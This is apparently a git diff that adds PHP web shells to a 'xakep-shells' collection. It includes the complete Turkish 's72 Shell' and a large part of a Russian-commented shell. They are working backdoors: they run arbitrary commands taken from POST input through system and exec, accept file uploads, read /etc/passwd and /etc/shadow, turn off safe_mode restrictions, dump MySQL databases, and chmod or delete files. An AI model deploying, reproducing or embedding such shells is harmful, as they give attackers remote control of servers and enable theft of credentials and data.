+            echo "<p align=center>Dosya Ba�ar�l� Bir �ekilde Y�klendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamad�</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>G�venlik A��k</b></font>';
+} else {
+   print '<font color=#008000><b>G�venlik Kapal�</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/s72_shell.txt b/xakep-shells/PHP/s72_shell.txt
new file mode 100644
index 0000000..fdcc41a
--- /dev/null
+++ b/xakep-shells/PHP/s72_shell.txt
@@ -0,0 +1,141 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>s72 Shell v1.0 Codinf by Cr@zy_King</title>
+<meta name="Microsoft Theme" content="refined 011">
+</head>
+
+<body background="refbgd2.gif" bgcolor="#000000" text="#FFFFFF" link="#666699" vlink="#999999" alink="#999900">
+
+<!--mstheme--><font face="Times New Roman">
+
+<p><font face="Comic Sans MS" color="#FF0000"><b>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </b>s72 Shell v1.1 Coding by <a href="mailto:crazy_king@turkusev.net">
+<font color="#00FF00">Cr@zy_King&nbsp; </font>
+</a> </font></p>
+
+      <p>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
+      <font color="#FF0000"><b><font face="Comic Sans MS" size="1">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [ 
+      Server Bilgileri ]</td>
+    </tr>
+    <tr>
+      <td width="49%" height="142">
+      </font></b></font>
+</p>
+      <p align="center">
+        <font color="#800080"><b><font face="Verdana" style="font-size: 8pt">
+        Dizin</font></b></font><font face="Verdana" style="font-size: 8pt"><font color="#800080"><b>:</b> <? echo $_SERVER['DOCUMENT_ROOT']; ?>
+        <br />
+        <b>Shell Dizini:</b> <? echo $SCRIPT_FILENAME ?>
+        <br>
+        &nbsp;</font></font><p align="center"><form method="post">
+<p align="center">
+<font color="#800080">
+<br>
+</font><font face="Verdana" style="font-size: 8pt" color="#800080">Buraya 
+Kodunuzu Yaz�n :)</font><font color="#111111"><br>
+<br>
+</font>
+<font color="#FF0000">
+<textarea size="70" name="command" rows="2" cols="43" ></textarea> <br>
+<br><input type="submit" value="�al��t�r!"></font><font color="#FF0000"><br>
+&nbsp;<br></font></p>
+      </form>
+      <p align="center">
+        <font color="#FF0000">
+        <textarea readonly size="1" rows="7" cols="53"><?php @$output = system($_POST['command']); ?></textarea></font><p align="center">
+        &nbsp;<p align="center">
+              <font color="#FF0000">
+              <td width="49%" height="24" bgcolor="#FCFEBA">
+              </font>
+      <p align="center"><font color="#FF0000"><b>
+      <font face="Comic Sans MS" size="1">[ Diziler -_- Dizinler ]</td>
+      <td width="51%" height="24" bgcolor="#FCFEBA">
+      </font></b></font>
+      <form method="post">
+<p align="center">
+<font face="Verdana" style="font-size: 11pt">
+<?
+$folder=opendir('./');
+while ($file = readdir($folder)) {
+if($file != "." && $file != "..")
+echo '<a target="_blank" href="'.$file.'">'.$file.'</a ><br>';
+}
+closedir($folder);
+?></p>
+      </form>
+      <p align="center">
+      <br>
+        <b><font face="Comic Sans MS" size="1" color="#FF0000">[ Upload ]</font></b></font><font face="Comic Sans MS" size="1"><b><font color="#FF0000"></td></font></b></font><form enctype="multipart/form-data" method="post">
+<p align="center"><br>
+<br>
+<font face="Verdana" style="font-size: 8pt" color="#800080">Buradan Dosya Upload Edebilirsiniz.</font><br>
+<br>
+<input type="file" name="file" size="20"><br>
+<br>
+<font style="font-size: 5pt">&nbsp;</font><br>
+<input type="submit" value="Y�kle!"> <br>
+&nbsp;</p>
+</form>
+<?php
+
+function check_file()
+{
+global $file_name, $filename;
+    $backupstring = "copy_of_";
+    $filename = $backupstring."$filename";
+
+    if( file_exists($filename))
+    {
+        check_file();
+    }
+}
+
+if(!empty($file))
+{
+    $filename = $file_name;
+    if( file_exists($file_name))
+    {
+        check_file();
+        echo "<p align=center>Dosya Zaten Bulunuyor</p>";
+    }
+
+    else
+    {
+        copy($file,"$filename");
+        if( file_exists($filename))
+        {
+            echo "<p align=center>Dosya Ba�ar�l� Bir �ekilde Y�klendi</p>";
+        }
+        elseif(! file_exists($filename))
+        {
+            echo "<p align=center>Dosya Bulunamad�</p>";
+        }
+    }
+}
+?> 
+<font face="Verdana" style="font-size: 8pt">
+<p align=\"center\"></font>
+</td>
+        <font color="#111111">
+        <br>
+        <br>
+        <br /><br /> </font>
+              <?php 
+// Check for Safe Mode
+if( ini_get('safe_mode') ) {
+   print '<font color=#FF0000><b>G�venlik A��k</b></font>';
+} else {
+   print '<font color=#008000><b>G�venlik Kapal�</b></font>';
+}
+
+?>
+
+        <!--mstheme--></font>
+
+        </body>
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/sh.php.php.txt b/xakep-shells/PHP/sh.php.php.txt
new file mode 100644
index 0000000..59c377b
--- /dev/null
+++ b/xakep-shells/PHP/sh.php.php.txt
@@ -0,0 +1,644 @@
+<?php
+
+                                       ##    ##  #
+                                         ##     #  ####
+                                           ## ##  ##  ##
+                                       ###  ###  ##    #
+                                     ### ##     ##     ##
+                                   ##    ###  ##       ##
+                                          #     #     ##
+                                        ###    #     ##
+                                      ### #   ##    ##
+                                      #   ##  ##   ##
+                                           #   #####
+                                   #       ##   ###
+                                  ##     ###     #
+                                   #######
+                                    #####
+
+//error_reporting(0);
+@ini_restore("safe_mode"); 
+@ini_restore("open_basedir"); 
+if(get_magic_quotes_gpc()){
+while(list($key,$val)=each($_POST)){
+$_POST[$key]=stripslashes($val);}}
+set_magic_quotes_runtime(0);
+@set_time_limit(0);
+@ini_set('max_execution_time',0);
+@ini_set('output_buffering',0);
+$name='1'; 
+$pass='c8d3a760ebab631565f8509d84b3b3f1';
+if(false){#esli nado pishem 'true'
+if (!isset($_SERVER['PHP_AUTH_USER']) || $_SERVER['PHP_AUTH_USER']!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass){
+header('WWW-Authenticate: Basic realm="Auth"');header('HTTP/1.0 401 Unauthorized');
+exit;}}
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", false);
+header("Pragma: no-cache");
+function font($color,$text,$size=4){return("<font color=$color size=$size >$text</font>");}
+function w($a){return str_repeat("&nbsp;",$a);}
+function b($b){return "<b>$b</b>";}
+function e($e){switch($e){
+case 0:return('no such file');
+case 1:return('no such dirictory');
+case 2:return('permission denied');
+case 3:return('is not dirictory');
+case 4:return('is a dirictory');
+}}
+function test_file($filename){
+return(file_exists($filename)?(is_readable($filename)?false:font('red',e(2))):font('red',e(0)));}
+if(isset($_POST['downl']) && !empty($_POST['downf'])){
+if(!preg_match('/^\//',$_POST['downf'])){
+$_POST['downf']=$_POST['th'].'/'.$_POST['downf'];}
+if(!test_file($_POST['downf'])){
+if(!is_dir($_POST['downf'])){
+$fd=fopen($_POST['downf'], "rb");
+$nam=preg_replace('/.+\//','',$_POST['downf']);
+header("Content-Type: application/octet-stream; name=\"".$nam."\"");
+header("Content-Length: ".filesize($_POST['downf']));
+header("Content-disposition: attachment; filename=\"".$nam."\"");
+while(!feof($fd)){
+$buffer=fgets($fd,4096);
+echo $buffer;
+}
+fclose ($fd);
+exit;
+}
+else $error=font('red',e(4));
+}
+else $error=test_file($_POST['downf']);}
+if(isset($_POST['sql']) && !isset($_POST['exitsql'])){
+$text="<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>
+";
+$a=array('server','user','password','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:'')."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'>
+<input type='submit' name='exitsql' value='Exit'>";
+$text="\n<body bgcolor=#C2DDFF>
+<b>Mysql@server:user:pass:db</b>
+<form method='POST'>\n";
+$a=array('srv','user','pass','db');$i=-1;
+while($i++<3){
+$text.= "<input type='text' name='".$a[$i]."' value='".((!empty($_POST[$a[$i]]))?$_POST[$a[$i]]:(($i==0)?'localhost':null))."'>\n";}
+$text.="<input type='submit' name='sql' value='Connect'><input type='submit' name='exitsql' value='Exit'>\n";
+if(isset($_POST['sql'])){
+if(isset($_POST['user']))$user=$_POST['user'];
+if(isset($_POST['pass']))$password=$_POST['pass'];
+if(isset($_POST['srv'])){
+$server=$_POST['srv'];
+$connect=mysql_connect($server,$user,$password) or die($text."</form>not connect");}
+else{die($text."</form>");}
+if(!empty($_POST['db'])){mysql_select_db($_POST['db'])or die("Could not select db<br>");}
+function write($data){
+switch($_POST['save']){
+case 0:
+global $dump;
+$dump.=$data;
+break;
+case 1:
+global $fp;
+switch($_POST['compr']){
+case 0:
+fwrite($fp,$data);
+break;
+case 1:
+gzwrite($fp, $data);
+break;
+case 2:
+bzwrite($fp,$data);
+break;}
+break;}}
+function sqlh(){
+global $dump,$server;
+write("#\n#Server : ".getenv('SERVER_NAME')."
+#DB_Host : ".$server."
+#DB : ".$_POST['db']."
+#Table : ".$_POST['table_sel']."\n#\n\n");}
+function sql(){
+global $dump,$connect;
+$row=mysql_fetch_row(mysql_query("SHOW CREATE TABLE `".$_POST['table_sel']."`",$connect));
+write("DROP TABLE IF EXISTS `".$_POST['table_sel']."`;\n".$row[1].";\n\n");}
+function sql1(){
+global $connect;
+$result=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect);
+function test($aaa){
+$d=array();
+while (list($key,$val)=each($aaa)){$d[$key]=addslashes($val);}
+return($d);}
+while ($line=mysql_fetch_assoc($result)) {
+((!isset($key))?($key=implode('`, `',array_keys($line))):null);
+$ddd=test(array_values($line));
+$val=implode('\', \'',$ddd);
+write("INSERT INTO `".$_POST['table_sel']."`(`".$key."`) VALUES ('".$val."');\n");}
+mysql_free_result($result);}
+function head($tmpfname,$name){
+header("Content-Type: application/octet-stream; name=\"$name\"");
+header("Content-Length: ".filesize($tmpfname)."");
+header("Content-disposition: attachment; filename=\"$name\"");
+$fd=fopen($tmpfname, "r");
+while(!feof($fd)){
+echo fgets($fd, 4096);}
+fclose($fd);
+unlink($tmpfname);
+exit;}
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+$dump='';
+if($_POST['save']==1){
+$tmpfname=tempnam($_POST['save_p'], "FOO");
+switch($_POST['compr']){
+case 0:
+$fp=fopen($tmpfname,"w");
+break;
+case 1:
+$fp=gzopen($tmpfname, "w9");
+break;
+case 2:
+$fp=bzopen($tmpfname, "w");
+break;}}
+switch($_POST['as']){
+case 0:
+switch($_POST['as_sql']){
+case 0:
+sqlh();
+sql();
+break;
+case 1:
+sqlh();
+sql();
+sql1();
+break;
+case 2:
+sqlh();
+sql1();
+break;}
+if($_POST['save']==1){
+switch($_POST['compr']){
+case 0:
+$n='.txt';
+fclose($fp);
+break;
+case 1:
+$n='.gz';
+gzclose($fp);
+break;
+case 2:
+$n='.bz2';
+bzclose($fp);
+break;}
+head($tmpfname,$_POST['table_sel'].$n);}
+break;
+case 1:
+$res=mysql_query("SELECT * FROM `".$_POST['table_sel']."`",$connect); 
+if(mysql_num_rows($res) > 0) {
+while($row = mysql_fetch_assoc($res)) { 
+$values = array_values($row); 
+foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+$values = implode($_POST['cvs_term'], $values); 
+write($values);}}
+break;}}
+echo "$text\n<table height=200 width=100%><tr><td bgcolor=green width=10%>";
+$db_list=mysql_list_dbs($connect);
+echo "<select name='db' multiple size=30>\n";
+while($row=mysql_fetch_object($db_list)){
+$db1=$row->Database;
+echo "<option value='$db1' ".(($db1===$_POST['db'])?'selected':'').">$db1</option>\n";}
+echo "</select></td><td bgcolor=#CBC3B6>\n";
+if(!empty($_POST['db'])){
+$tb_list=mysql_list_tables($_POST['db']);
+echo "<select name='table_sel' multiple size=30>";
+for($i=0;$i<mysql_num_rows($tb_list);$i++){
+$n=mysql_fetch_array(mysql_query('select count(*) from '.mysql_tablename($tb_list,$i)));
+echo "<option value='".mysql_tablename($tb_list, $i)."'".($tr=((isset($_POST['table_sel']) && $_POST['table_sel']===mysql_tablename($tb_list, $i))?'selected':'')).">".mysql_tablename($tb_list, $i).'('.$n[0].")</option>";}
+echo "</select></td><td width=100%>
+<table  width=100% height=100% bgcolor='#E3FFF2'><tr><td height=20 bgcolor=#dfdfdf width=100%><nobr>\n";
+if(isset($_POST['table_sel'])){
+$c=array('Browse','SQL','Insert','Export');$i=-1;
+while($i++<3){echo "<input type=radio Name='go' value='".($i)."'>".$c[$i];}}
+echo "&nbsp;&nbsp;<b>".((isset($_POST['table_sel']))?$_POST['table_sel']:null)."</b></nobr></td></tr><tr width=100%><td width=100%>\n";}
+if(isset($_POST['push']) && isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']))$_POST['go']=0;
+elseif(isset($_POST['push']))$_POST['go']=1;
+if(isset($_POST['back']))$_POST['go']=3;
+if(isset($_POST['brow']))$_POST['go']=0;
+if(isset($_POST['editr']) && isset($_POST['edit']))$_POST['go']=4;
+if(isset($_POST['ed_save']))$_POST['go']=5;
+if(isset($_POST['editr']) && !isset($_POST['edit']))$_POST['go']=0;
+if(isset($_POST['go'])){switch($_POST['go']){
+case 0:
+if(isset($_POST['querysql']) && preg_match('/^\s*select /i',$_POST['querysql']) && isset($_POST['push'])){
+$n=mysql_fetch_array(mysql_query(preg_replace('/^\s*select\s+.+\s+from\s+/i','select count(*) from',$_POST['querysql'])));
+$result=mysql_query($_POST['querysql'],$connect);}
+else{$n=mysql_fetch_array(mysql_query('select count(*) from '.$_POST['table_sel']));$sort='';
+if(!empty($_POST['sort']))$sort='ORDER BY `'.trim($_POST['sort']).'` ASC ';$co='0,20';
+if(isset($_POST['br_st']) && isset($_POST['br_en'])){
+$co=$_POST['br_en'].','.$_POST['br_st'];}
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` $sort limit $co",$connect);}
+for($i=0;$i<mysql_num_fields($result);$i++){
+if(ereg('primary_key',mysql_field_flags($result, $i)))
+$prim=mysql_field_name($result, $i);}
+$up_e='';
+echo "<div style='width:100%;height:450px;overflow:auto;'><table border=1>\n";
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){echo "<tr bgcolor='#C1D2C5'>\n";
+if(!isset($lk)){
+echo "<td><b>EDIT</b></td>";
+foreach(array_keys($line) as $lk){print((isset($prim) && $lk===$prim)?"<td><u><b>$lk</b></u></td>":"<td>$lk</td>\n");}}
+if(!isset($prim)){
+while(list($key,$val)=each($line)){$up_e.="`$key`='".addslashes($val)."' and ";}
+$up_e=substr($up_e,0,-5);}
+else{while(list($key,$val)=each($line)){
+if($key===$prim){$up_e.="`$key`='".addslashes($val)."'";}}}
+$up_e=urlencode($up_e);
+echo "</tr><tr><td><input type=radio name=edit value='$up_e'></td>\n";
+$up_e='';
+foreach($line as $col_value){echo "<td>".((strlen($col_value)>40)?'<textarea cols=40 rows=7>'.htmlspecialchars($col_value).'</textarea>':htmlspecialchars($col_value))."</td>\n";}
+echo "</tr>\n";}
+echo "</table></div><input type=submit name='brow' value='Browse'><b>Sort by
+<input type=text name=sort size=10 value='".((isset($_POST['sort']))?$_POST['sort']:'')."'>
+Show <input type=text size=5 value=".((isset($_POST['br_st']))?$_POST['br_st']:$n[0])." name='br_st'>row(s) starting from<input type=text size=5 value=".((isset($_POST['br_en']))?$_POST['br_en']:'0')." name='br_en'></b>
+<input type=submit name=editr value=Edit>";
+mysql_free_result($result);
+break;
+case 1:
+echo "<input type=submit name=push value=Run><br>
+<textarea cols=70% rows=8 name='querysql'>\n".((!empty($_POST['querysql']))?htmlspecialchars($_POST['querysql'],ENT_QUOTES):((isset($_POST['table_sel']))?"SELECT * FROM `".$_POST['table_sel']."` WHERE 1":null))."</textarea><br><br>\n";
+if(!empty($_POST['querysql'])){
+$result = mysql_query($_POST['querysql'],$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";}
+break;
+case 2:
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";
+$fields=mysql_list_fields($_POST['db'],$_POST['table_sel'],$connect);
+for($i=0;$i<mysql_num_fields($fields);$i++){
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($fields,$i).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($fields, $i).'('.mysql_field_len($fields, $i).")</b></td><td>".((mysql_field_len($fields, $i)<40)?"<input type='text' name='ed_key:".mysql_field_name($fields,$i)."' value='' size=40>":"<textarea name='ed_key:".mysql_field_name($fields,$i)."' cols=31 rows=7></textarea>")."</td></tr>\n";}
+echo "</table></div><input type=hidden name=insert value=1><input type=submit name=ed_save value=Insert>";
+break;
+case 3:
+if(!isset($_POST['back']))echo '<table height=250  align="center"><TR><TD>
+<table height=100%>
+<tr><td bgcolor="#A8B8F1" width="100" height="20"><b>&nbsp;&nbsp;Export as</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="0" checked><b>&nbsp;&nbsp;SQL</b></td></tr>
+<tr><td bgcolor="#D0E0FF" width="100" height="20"><input type=radio Name="as" value="1"><b>&nbsp;&nbsp;CSV</b></td></tr>
+<tr><td height=100%></td></tr>
+</table></TD><td>
+<table width="140" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;SQL</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="0" ><b>Only structure</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="1" checked><b>All</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="as_sql" value="2"><b>Only data</b></TD></TR>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>CSV</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><b>Terminated&nbsp;</b><input size=2 type=text Name="cvs_term" value=":"></TD></TR>
+<tr><td height=100%></tb></tr>
+</table>
+</td><td>
+<table height=100%>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="0" checked><b>&nbsp;View</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="100" height="20"><input type=radio Name="save" value="1"><b>&nbsp;Download</b></td></tr>
+<tr><td bgcolor="#E6D29C" width="130" height="40"><b>&nbsp;Temp path</b><br><input type=text Name="save_p" value="/tmp"></td></tr>
+<tr><td height=100%></td></tr>
+</table></td><td>
+<table width="120" height=100%>
+<TR><TD bgcolor="#A8B8F1"  height="20"><b>&nbsp;&nbsp;Compression</b></TD></TR>
+<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="0" checked><b>None</b></TD></TR>'.
+((@function_exists('gzencode'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="1" ><b>Gzip</b></TD></TR>':'').
+((@function_exists('bzcompress'))?'<TR><TD bgcolor="#D0E0FF"  height="20"><input type=radio Name="compr" value="2"><b>Bzip</b></TD></TR>
+<tr><td height=100%></td></tr>':'').'</table></td></TR>
+<tr><td><input type=submit value=backup name=back></td></tr>
+</table>';
+if(isset($_POST['back']) && isset($_POST['table_sel'])){
+if($_POST['save']==0){echo "<textarea cols=70 rows=10>".htmlspecialchars($dump)."</textarea>";}}
+break;
+case 4:
+if(isset($_POST['edit'])){
+$up_e=$_POST['edit'];
+echo "<input type=hidden name=edit value='$up_e'>";
+$up_e=urldecode($_POST['edit']);
+echo "<div style='width:100%;height:550;overflow:auto;'><table>\n";$fi=0;
+$result = mysql_query("SELECT * FROM `".$_POST['table_sel']."` WHERE $up_e",$connect);
+while($line=mysql_fetch_array($result,MYSQL_ASSOC)){
+foreach($line as $key=>$col_value) {
+echo "<tr><td bgcolor=#DBDCDD><b>".mysql_field_name($result,$fi).'</td><td bgcolor=#B9C3D7>'.mysql_field_type($result,$fi).'('.mysql_field_len($result,$fi).")</b></td><td>".((mysql_field_len($result,$fi)<40)?"<input type='text' name='ed_key:".mysql_field_name($result,$fi)."' value='".htmlspecialchars($col_value,ENT_QUOTES)."' size=40>":"<textarea name='ed_key:".mysql_field_name($result,$fi)."' cols=31 rows=7>".htmlspecialchars($col_value,ENT_QUOTES)."</textarea>")."</td></tr>\n";
+$fi++;}}
+echo "</table></div><input type=submit name=ed_save value=Save>";}
+break;
+case 5:
+$ted='';
+$_POST2=$_POST;# X.Z. zachem, xernya kakaeto :)
+while(list($key1,$val1)=each($_POST2)){
+if(preg_match('/ed_key:(.+)/',$key1,$m))
+{$ted.="`".$m[1]."`= '".addslashes($val1)."', ";}}
+$ted=substr($ted,0,-2);
+$query=((isset($_POST['insert']))?"INSERT":"UPDATE")." `".$_POST['table_sel']."` SET $ted ".((isset($_POST['insert']))?'':"WHERE ".urldecode($_POST['edit'])." LIMIT 1 ");
+echo "<div style='background-color:white;'>".htmlspecialchars($query,ENT_QUOTES)."</div><br>";
+$result = mysql_query($query,$connect) or print("<div style='background-color:red;'>".mysql_error($connect)."</div>");
+echo "<div style='background-color:green;'>".mysql_info($connect)."</div>";
+break;}}
+echo "</td></tr></table></td></tr></table><input type=hidden name=sql>\n";}
+else echo $text;
+echo "</form></body>";exit;}
+echo "<html><body bgcolor=white><center><table bgcolor=orange height=10 border=1><tr><td><nobr>".font('blue',@php_uname())."</nobr></td></tr></table><table bgcolor=orange height=10 border=1><tr><nobr><td>".font('blue','PHP:'.@phpversion())."</nobr></td><td><nobr>".font('blue',date('H:i:s l d F Y'))."</nobr></td><td><nobr>".font('blue',getenv('SERVER_ADDR'))."</nobr></td><td><nobr>".font('blue',getenv('REMOTE_ADDR'))."</nobr></td></tr></table><br></center>\n";
+if(!test_file('/etc/shadow'))echo font('red',b('shadow readable<br>'));
+if(!test_file('/etc/shadow-'))echo font('red',b('shadow- readable<br>'));
+if(!test_file('/etc/master.passwd'))echo font('red',b('master.passwd readable<br>'));
+if(!empty($_POST['th']))@chdir($_POST['th']);
+echo ((is_writable('/tmp/'))?font('green',"TEMP USE".w(1)):font('red',"TEMP NO USE"));
+#UP
+if(isset($_POST['up']))@chdir('../');
+#CD
+if(isset($_POST['c']) && $_POST['cd']!=''){
+if(!test_file($_POST['cd'])){
+if(is_dir($_POST['cd'])){
+@chdir($_POST['cd']);
+}
+else $error=font('red',e(3));
+}
+else $error=test_file($_POST['cd']);}
+echo w(3)."<input type=text size=60 value=".getcwd().">";
+echo font('blue','USER : '.get_current_user());
+if(file_exists("/"))
+echo((is_readable("/"))?w(2).font('green','DIR / - IS READ'):w(2).font('red','DIR / - IS NO READ'));
+if(file_exists("C:/"))
+echo((is_readable("C:/"))?w(2).font('green','DIR C:/ - IS READ'):w(2).font('red','DIR C:/ - IS NO READ'));
+if(ini_get('safe_mode'))echo w(2).font('red','SAFE MODE');
+echo "<br>";
+?>
+<hr>
+<form method=POST name=main>
+<input type="submit" value="^" name="up">
+<input type=text name=cd>
+<input type=submit value=cd name=c>
+<input type=text name=open>
+<input type=submit value=open name=op>
+<input type=text name=new>
+<input type=submit name=cr value="new file">
+<input type=text name=exec>
+<input type=submit name=exe value=exec>
+<input type=submit name=info value=phpinfo>
+<br>
+<?php
+$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/etc/hosts','/proc/version','/proc/cpuinfo','/proc/meminfo','/etc/httpd/conf/httpd.conf','/usr/local/apache/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/etc/syslog.conf');
+echo '<select name=passwd>';
+foreach($ar_file as $ar_l){
+if(!test_file($ar_l))echo "<option value='$ar_l'>$ar_l</option>\n";}
+echo '</select><input type=submit name=passw value="read file">';
+?>
+<input type=submit name=menu value=upload>
+<input type=text name=downf>
+<input type=submit name=downl value=download>
+<input type=text name="test">
+<input type=submit name=tes value="perms">
+<input type="submit" name="sql" value="mysql">
+<input type="submit" name="eval" value="eval">
+<br>
+<input type=text name=strin>
+<input type=text name=remot>
+<input type=submit name=copy value=copy>
+<input type="text" name="renold" >
+<input type="text" name="rennew" >
+<input type="submit" name="rename" value="rename">
+<input type=text name=rm >
+<input type=submit name=del value=del>
+<br>
+<input type=reset value=RESET>
+<input type="text" name="mkdir">
+<input type="submit" name="mk" value="mkdir">
+<input type="text" name="rmdir">
+<input type="submit" name="rmd" value="rmdir">
+<input type="text" name="ch_mod">
+<?php
+for($bch=1;$bch<=3;$bch++){echo"<select name=ch_p$bch>\n";
+for($ach=7;$ach>=0;$ach--){echo"<OPTION value=$ach>$ach</OPTION>";}
+echo"</select>";}
+?>
+<input type="submit" name="ch_chmod" value="chmod">
+<input type=submit name=find value='find writeable'>
+<br>
+<hr>
+<?php
+#FIND WRITEABLE##############
+if(isset($_POST['find'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" checked>Only writeable:<input type=checkbox name="onw" checked><input type=submit name=fww value="Find it">');}
+if(isset($_POST['fww']) && !empty($_POST['fpath'])){
+echo b('Start path: <input type=text name=fpath>Only dir<input type=checkbox name="dy" '.(isset($_POST['dy'])?'checked':null).'>Only writeable:<input type=checkbox name="onw" '.(isset($_POST['onw'])?'checked':null).'><input type=submit name=fww value="Find it"><hr>');
+$arrfw=array($_POST['fpath']);
+$ife=0;
+while(++$ife<=count($arrfw)){
+$pathfw=$arrfw[$ife-1];
+if(is_readable($pathfw)){
+if($hfw=opendir($pathfw)){
+while(false!==($ffw=readdir($hfw))){
+$ffw=$pathfw.$ffw;
+if(!preg_match('/\/\.+$/',$ffw)){
+if(is_dir($ffw)){array_push($arrfw,$ffw.'/');}
+print(is_dir($ffw)?(is_writeable($ffw)?font('red',"$ffw/<br>",3) :(isset($_POST['onw'])?null:"$ffw/<br>")):(!isset($_POST['dy'])?(is_writeable($ffw)?font('green',"$ffw<br> ",3):(isset($_POST['onw'])?null:"$ffw<br>")):null));}}
+closedir($hfw);}}}}
+
+
+if(isset($_POST['eval'])){
+echo "<textarea cols=70 rows=7 name='ev'></textarea>\n";
+
+
+
+
+
+echo "";
+}
+############################################################################
+#RENAME
+if(isset($_POST['rename']) && $_POST['renold']<>'' && $_POST['rennew']<>''){
+if(file_exists($_POST['renold'])){
+@rename($_POST['renold'],$_POST['rennew']);
+}
+else $error=font('red',e(0));
+}
+#
+
+#RMDIR
+if(isset($_POST['rmd']) && isset($_POST['rmdir'])){
+if(file_exists($_POST['rmdir'])){
+if(is_dir($_POST['rmdir'])){
+if(@rmdir($_POST['rmdir'])) echo font('green',"dir ".b($_POST['rmdir'])." delet"); 
+else $error=font('red','dir not deleted');
+}
+else $error=font('red',e(3));
+}
+else $error=font('red',e(0));
+}
+#
+#CHMOD
+if(isset($_POST['ch_chmod']) && isset($_POST['ch_mod'])){
+if(file_exists($_POST['ch_mod'])){
+@chmod($_POST['ch_mod'],octdec($_POST['ch_p1'].$_POST['ch_p2'].$_POST['ch_p3']));}
+else $error=font('red',e(0));}
+#
+#DELETE
+if(isset($_POST['del']) && $_POST['rm']!=''){
+if(file_exists($_POST['rm'])){
+if(!is_dir($_POST['rm'])){
+@unlink($_POST['rm']);
+}
+else echo "<br>".font('red',e(4)."<br>");
+}
+else echo "<br>".font('red',e(0)."<br>");
+}
+#
+#EXEC
+if(!empty($_POST['exe'])){
+if(@exec($_POST['exec'],$ar)){
+echo "<textarea cols=70 rows=15>";
+foreach($ar as $line){
+echo $line."\n";
+}
+echo "</textarea>";}}
+#
+#OPEN FILE
+if(isset($_POST['op']) && $_POST['open']!=''){
+if(!test_file($_POST['open'])){
